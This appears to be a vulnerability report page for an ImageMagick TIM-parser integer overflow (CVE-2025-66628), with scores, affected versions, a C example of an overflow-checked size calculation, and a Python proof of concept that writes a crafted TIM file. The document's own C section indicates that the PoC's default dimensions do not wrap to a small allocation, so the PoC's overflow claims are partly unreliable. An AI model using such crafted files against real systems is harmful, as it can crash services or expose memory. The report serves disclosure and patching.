Security Vulnerability Report
CVE-2025-66628 CVSS 7.5 HIGH

CVE-2025-66628

Published: 2025-12-10 22:16:29
Last Modified: 2026-01-06 18:17:40

Description

ImageMagick is a software suite to create, edit, compose, or convert bitmap images. In versions 7.1.2-9 and prior, the TIM (PSX TIM) image parser contains a critical integer overflow vulnerability in its ReadTIMImage function (coders/tim.c). The code reads width and height (16-bit values) from the file header and calculates image_size = 2 * width * height without checking for overflow. On 32-bit systems (or where size_t is 32-bit), this calculation can overflow if width and height are large (e.g., 65535), wrapping around to a small value. This results in a small heap allocation via AcquireQuantumMemory, and later operations relying on the dimensions can trigger an out-of-bounds read. This issue is fixed in version 7.1.2-10.
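As an added illustration (not ImageMagick's own code), the unchecked `2 * width * height` computation from the description beside an overflow-checked replacement of the kind a parser should use before calling its allocator. `size32_t` is a uint32_t stand-in for a 32-bit size_t so the wrap-around reproduces on any host, and the function names are hypothetical.

```c
#include <inttypes.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Stand-in for size_t on a 32-bit build, so the wrap-around is reproducible
 * on 64-bit hosts too (assumption made for this example). */
typedef uint32_t size32_t;

#define TIM_BYTES_PER_PIXEL 2u   /* 16-bit pixels, as in the description */

/* The pattern described above: no check, product silently truncated to 32 bits. */
static size32_t tim_image_size_unchecked(uint16_t width, uint16_t height)
{
    return TIM_BYTES_PER_PIXEL * (size32_t) width * (size32_t) height;
}

/* Hardened form: reject any dimensions whose byte count does not fit, so the
 * allocation can never be smaller than the pixel count implies. */
static bool tim_image_size_checked(uint16_t width, uint16_t height,
                                   size32_t *image_size)
{
    if (width == 0 || height == 0)
        return false;                          /* nothing sensible to allocate */
    /* height > MAX / (bpp * width)  <=>  bpp * width * height > MAX, computed
       without overflow: bpp * width is at most 2 * 65535 and always fits. */
    if ((size32_t) height > UINT32_MAX / (TIM_BYTES_PER_PIXEL * (size32_t) width))
        return false;
    *image_size = TIM_BYTES_PER_PIXEL * (size32_t) width * (size32_t) height;
    return true;
}

/* Convenience wrapper: 0 means the dimensions were rejected. */
static size32_t tim_image_size_or_zero(uint16_t width, uint16_t height)
{
    size32_t n = 0;
    return tim_image_size_checked(width, height, &n) ? n : 0;
}

int main(void)
{
    /* Constructed header values: a product just over 2^31 wraps to a few KiB. */
    const uint16_t w = 32769, h = 65535;
    printf("unchecked %u x %u -> %" PRIu32 " bytes\n", (unsigned) w, (unsigned) h,
           tim_image_size_unchecked(w, h));                     /* 65534 */
    printf("checked   %u x %u -> %" PRIu32 " (0 = rejected)\n", (unsigned) w,
           (unsigned) h, tim_image_size_or_zero(w, h));         /* 0 */
    return 0;
}
```

Note that width = height = 65535 from the description truncates to 4294705154, which is still huge; the "small value" case needs a product just above 2^31, such as 32769 x 65535, which truncates to 65534 bytes for a 32769 x 65535 image.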

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:* - VULNERABLE
ImageMagick < 7.1.2-10
ImageMagick 7.1.2-9
ImageMagick 7.1.2-8
ImageMagick 7.1.2-7
ImageMagick 7.1.2-6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import struct
import sys


def create_malicious_tim_file(filename, width=65535, height=65535):
    """
    Generate a malicious TIM image file to trigger integer overflow in ImageMagick

    CVE-2025-66628: Integer overflow in ReadTIMImage function (coders/tim.c)

    The TIM file format header contains:
    - Width and Height as 16-bit values
    - Calculation: image_size = 2 * width * height
    - When width=height=65535: 2*65535*65535 = 8589672450 (overflows on 32-bit)
    """
    # Layout of the file written below
    # Bytes 0-3:  TIM signature (typically 0x00000010)
    # Bytes 4-7:  Image type and flags
    # Bytes 8-9:  Width (16-bit, little-endian)
    # Bytes 10-11: Height (16-bit, little-endian)
    with open(filename, 'wb') as f:
        # TIM header
        f.write(struct.pack('<I', 0x00000010))  # TIM signature
        f.write(struct.pack('<I', 0x00000000))  # Type/flags
        f.write(struct.pack('<H', width))       # Width (16-bit)
        f.write(struct.pack('<H', height))      # Height (16-bit)
        # Add minimal image data to pass initial validation
        # The overflow occurs during size calculation before data validation
        f.write(b'\x00' * 16)

    print(f"Malicious TIM file created: {filename}")
    print(f"Width: {width}, Height: {height}")
    print(f"Calculated size: {2 * width * height}")
    print(f"On 32-bit systems, this will overflow and wrap to: "
          f"{(2 * width * height) & 0xFFFFFFFF}")


if __name__ == '__main__':
    if len(sys.argv) > 1:
        create_malicious_tim_file(sys.argv[1])
    else:
        create_malicious_tim_file('exploit_cve_2025_66628.tim')

References

Vendor Advisory: https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-6hjr-v6g4-3fm8
Patch (Magick.NET): https://github.com/dlemstra/Magick.NET/commit/2dfa08e15cfd11016a79615994787b14f9048b1c

Weakness

CWE-125 (Out-of-bounds Read)

CVSS Sub-scores

Exploitability Score: 3.9
Impact Score: 3.6